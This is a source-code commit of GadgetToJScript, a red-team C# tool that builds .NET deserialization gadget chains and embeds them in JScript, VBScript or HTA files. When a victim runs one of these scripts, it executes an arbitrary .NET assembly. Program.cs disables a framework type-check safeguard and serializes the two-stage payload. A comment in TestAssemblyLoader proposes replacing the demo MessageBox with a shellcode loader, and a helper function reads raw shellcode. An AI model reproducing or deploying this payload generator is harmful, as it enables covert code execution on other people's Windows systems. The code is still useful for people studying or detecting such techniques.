Initial Commit

Author: med0x2e

GadgetToJScript.sln

@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 15
+VisualStudioVersion = 15.0.28010.2003
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "GadgetToJScript", "GadgetToJScript\GadgetToJScript.csproj", "{AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Debug|x86 = Debug|x86
+		Release|Any CPU = Release|Any CPU
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9}.Debug|x86.ActiveCfg = Debug|x86
+		{AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9}.Debug|x86.Build.0 = Debug|x86
+		{AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9}.Release|Any CPU.Build.0 = Release|Any CPU
+		{AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9}.Release|x86.ActiveCfg = Release|x86
+		{AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9}.Release|x86.Build.0 = Release|x86
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {40DC7508-EF01-47FD-A8C1-25D048A8FD98}
+	EndGlobalSection
+EndGlobal

GadgetToJScript/App.Config

@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8" ?>
+<configuration>
+    <startup> 
+        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.1" />
+    </startup>
+</configuration>

GadgetToJScript/GadgetToJScript.csproj

@@ -0,0 +1,90 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9}</ProjectGuid>
+    <OutputType>Exe</OutputType>
+    <RootNamespace>GadgetToJScript</RootNamespace>
+    <AssemblyName>GadgetToJScript</AssemblyName>
+    <TargetFrameworkVersion>v4.6.1</TargetFrameworkVersion>
+    <FileAlignment>512</FileAlignment>
+    <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
+    <Deterministic>true</Deterministic>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x86'">
+    <DebugSymbols>true</DebugSymbols>
+    <OutputPath>bin\x86\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <DebugType>full</DebugType>
+    <PlatformTarget>x86</PlatformTarget>
+    <ErrorReport>prompt</ErrorReport>
+    <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
+    <Prefer32Bit>true</Prefer32Bit>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x86'">
+    <OutputPath>bin\x86\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <Optimize>true</Optimize>
+    <DebugType>pdbonly</DebugType>
+    <PlatformTarget>x86</PlatformTarget>
+    <ErrorReport>prompt</ErrorReport>
+    <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
+    <Prefer32Bit>true</Prefer32Bit>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="NDesk.Options, Version=0.2.1.0, Culture=neutral, processorArchitecture=MSIL">
+      <HintPath>..\packages\NDesk.Options.0.2.1\lib\NDesk.Options.dll</HintPath>
+    </Reference>
+    <Reference Include="System" />
+    <Reference Include="System.Configuration" />
+    <Reference Include="System.Core" />
+    <Reference Include="System.Runtime.Remoting" />
+    <Reference Include="System.Web" />
+    <Reference Include="System.Xml.Linq" />
+    <Reference Include="System.Data.DataSetExtensions" />
+    <Reference Include="Microsoft.CSharp" />
+    <Reference Include="System.Data" />
+    <Reference Include="System.Net.Http" />
+    <Reference Include="System.Xml" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="Program.cs" />
+    <Compile Include="Properties\AssemblyInfo.cs" />
+    <Compile Include="TestAssemblyLoader.cs" />
+    <Compile Include="_ASurrogateGadgetGenerator.cs" />
+    <Compile Include="_DisableTypeCheckGadgetGenerator.cs" />
+    <Compile Include="_SurrogateSelector.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="App.Config">
+      <SubType>Designer</SubType>
+    </None>
+    <None Include="packages.config" />
+    <EmbeddedResource Include="templates\htascript.template" />
+    <EmbeddedResource Include="templates\jscript.template" />
+    <EmbeddedResource Include="templates\jscript-regfree.template" />
+    <EmbeddedResource Include="templates\vbscript.template" />
+  </ItemGroup>
+  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+</Project>

GadgetToJScript/Program.cs

@@ -0,0 +1,158 @@
+//    GadgetToJscript.
+//    Copyright (C) Elazaar / @med0x2e 2019
+//
+//    GadgetToJscript is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
+//    the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
+//
+//    GadgetToJscript is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
+//    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
+//
+//    You should have received a copy of the GNU General Public License
+//    along with GadgetToJscript.  If not, see <http://www.gnu.org/licenses/>.
+
+
+using NDesk.Options;
+using System;
+using System.Configuration;
+using System.IO;
+using System.Reflection;
+using System.Runtime.Serialization.Formatters.Binary;
+
+namespace GadgetToJScript{
+
+    class Program{
+
+
+        enum EWSH
+        {
+            js,
+            vbs,
+            vba,
+            hta
+        }
+
+
+        private static string _wsh;
+        private static string _outputFName = "test";
+        private static bool _regFree = false;
+
+        static void Main(string[] args)
+        {
+
+            var show_help = false;
+
+
+            OptionSet options = new OptionSet(){
+                {"w|scriptType=","js, vbs, vba or hta", v =>_wsh=v},
+                {"o|output=","Generated payload output file, example: C:\\Users\\userX\\Desktop\\output (Without extension)", v =>_outputFName=v},
+                {"r|regfree","registration-free activation of .NET based COM components", v => _regFree = v != null},
+                {"h|help=","Show Help", v => show_help = v != null},
+            };
+
+            try
+            {
+                options.Parse(args);
+
+                if (_wsh == "" || _outputFName == "")
+                {
+                    showHelp(options);
+                    return;
+                }
+
+                if (!Enum.IsDefined(typeof(EWSH), _wsh))
+                {
+                    showHelp(options);
+                    return;
+                }
+            }
+            catch (Exception e)
+            {
+                Console.WriteLine(e.Message);
+                Console.WriteLine("Try --help for more information.");
+                showHelp(options);
+                return;
+
+            }
+
+            string resourceName = "";
+            switch (_wsh)
+            {
+                case "js":
+                    if (_regFree) { resourceName = "GadgetToJScript.templates.jscript-regfree.template"; }
+                    else { resourceName = "GadgetToJScript.templates.jscript.template"; }
+                    break;
+                case "vbs":
+                    resourceName = "GadgetToJScript.templates.vbscript.template";
+                    break;
+                case "vba":
+                    Console.WriteLine("Not supported yet, only JS, VBS and HTA are supported at the moment");
+                    return;
+                //resourceName = "GadgetToJScript.templates.vbascript.template";
+                //break;
+                case "hta":
+                    resourceName = "GadgetToJScript.templates.htascript.template";
+                    break;
+                default:
+                    if (_regFree) { resourceName = "GadgetToJScript.templates.jscript-regfree.template"; }
+                    else { resourceName = "GadgetToJScript.templates.jscript.template"; }
+                    break;
+            }
+
+
+            MemoryStream _msStg1 = new MemoryStream();
+            _DisableTypeCheckGadgetGenerator _disableTypCheckObj = new _DisableTypeCheckGadgetGenerator();
+
+            _msStg1 = _disableTypCheckObj.generateGadget(_msStg1);
+
+
+            ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");
+
+
+            Assembly testAssembly = TestAssemblyLoader.compile();
+
+            BinaryFormatter _formatterStg2 = new BinaryFormatter();
+            MemoryStream _msStg2 = new MemoryStream();
+            _ASurrogateGadgetGenerator _gadgetStg = new _ASurrogateGadgetGenerator(testAssembly);
+
+            _formatterStg2.Serialize(_msStg2, _gadgetStg);
+
+
+            Assembly assembly = Assembly.GetExecutingAssembly();
+            string _wshTemplate = "";
+
+
+            using (Stream stream = assembly.GetManifestResourceStream(resourceName))
+            using (StreamReader reader = new StreamReader(stream))
+            {
+                _wshTemplate = reader.ReadToEnd();
+                _wshTemplate = _wshTemplate.Replace("%_STAGE1_%", Convert.ToBase64String(_msStg1.ToArray()));
+                _wshTemplate = _wshTemplate.Replace("%_STAGE1Len_%", _msStg1.Length.ToString());
+                _wshTemplate = _wshTemplate.Replace("%_STAGE2_%", Convert.ToBase64String(_msStg2.ToArray()));
+                _wshTemplate = _wshTemplate.Replace("%_STAGE2Len_%", _msStg2.Length.ToString());
+            }
+
+            using (StreamWriter _generatedWSH = new StreamWriter(_outputFName + "." + _wsh))
+            {
+                _generatedWSH.WriteLine(_wshTemplate);
+            }
+
+        }
+
+        public static void showHelp(OptionSet p)
+        {
+            Console.WriteLine("Usage:");
+            p.WriteOptionDescriptions(Console.Out);
+        }
+
+        public static byte[] readRawShellcode(string _SHFname)
+        {
+            byte[] _buf = null;
+            using (FileStream fs = new FileStream(_SHFname, FileMode.Open, FileAccess.Read))
+            {
+                _buf = new byte[fs.Length];
+                fs.Read(_buf, 0, (int)fs.Length);
+            }
+            return _buf;
+        }
+    }
+}

GadgetToJScript/Properties/AssemblyInfo.cs

@@ -0,0 +1,49 @@
+//    GadgetToJscript.
+//    Copyright (C) Elazaar / @med0x2e 2019
+//
+//    GadgetToJscript is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
+//    the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
+//
+//    GadgetToJscript is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
+//    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
+//
+//    You should have received a copy of the GNU General Public License
+//    along with GadgetToJscript.  If not, see <http://www.gnu.org/licenses/>.
+
+
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("GadgetToJscript")]
+[assembly: AssemblyDescription("A simple utility for generating .NET serialized gadgets that can trigger .NET assembly execution when deserialized using BinaryFormatter from JS/VBS based scripts ")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("GadgetToJscript")]
+[assembly: AssemblyCopyright("Copyright ©  Elazaar / @med0x2e 2019")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components.  If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+[assembly: Guid("af9c62a1-f8d2-4be0-b019-0a7873e81ea9")]
+
+// Version information for an assembly consists of the following four values:
+//
+//      Major Version
+//      Minor Version
+//      Build Number
+//      Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]

GadgetToJScript/TestAssemblyLoader.cs

@@ -0,0 +1,57 @@
+using Microsoft.CSharp;
+using System;
+using System.CodeDom.Compiler;
+using System.Reflection;
+using System.Text;
+
+namespace GadgetToJScript
+{
+    class TestAssemblyLoader
+    {
+        public static Assembly compile()
+        {
+            // Shellcode loader would make more sense here, just make sure your code is located within the default constructor.
+            string _testClass = @"
+                    
+                using System;
+                using System.Runtime.InteropServices;
+
+                    public class TestClass
+                    {
+                        " + "[DllImport(\"User32.dll\", CharSet = CharSet.Unicode)]" +
+                        @"public static extern int MessageBox(IntPtr h, string m, string c, int t);
+
+                        public TestClass(){
+                            " + "MessageBox((IntPtr)0, \"Test .NET Assembly Constructor Called.\", \"Coolio\", 0);" +
+                        @"}
+                    }
+            
+            ";
+
+            CSharpCodeProvider provider = new CSharpCodeProvider();
+            CompilerParameters parameters = new CompilerParameters();
+
+            parameters.ReferencedAssemblies.Add("System.dll");
+
+
+            CompilerResults results = provider.CompileAssemblyFromSource(parameters, _testClass);
+
+            if (results.Errors.HasErrors)
+            {
+                StringBuilder sb = new StringBuilder();
+
+                foreach (CompilerError error in results.Errors)
+                {
+                    sb.AppendLine(String.Format("Error ({0}): {1}: {2}", error.ErrorNumber, error.ErrorText, error.Line));
+                }
+
+                throw new InvalidOperationException(sb.ToString());
+            }
+
+            Assembly _compiled = results.CompiledAssembly;
+
+            return _compiled;
+        }
+
+    }
+}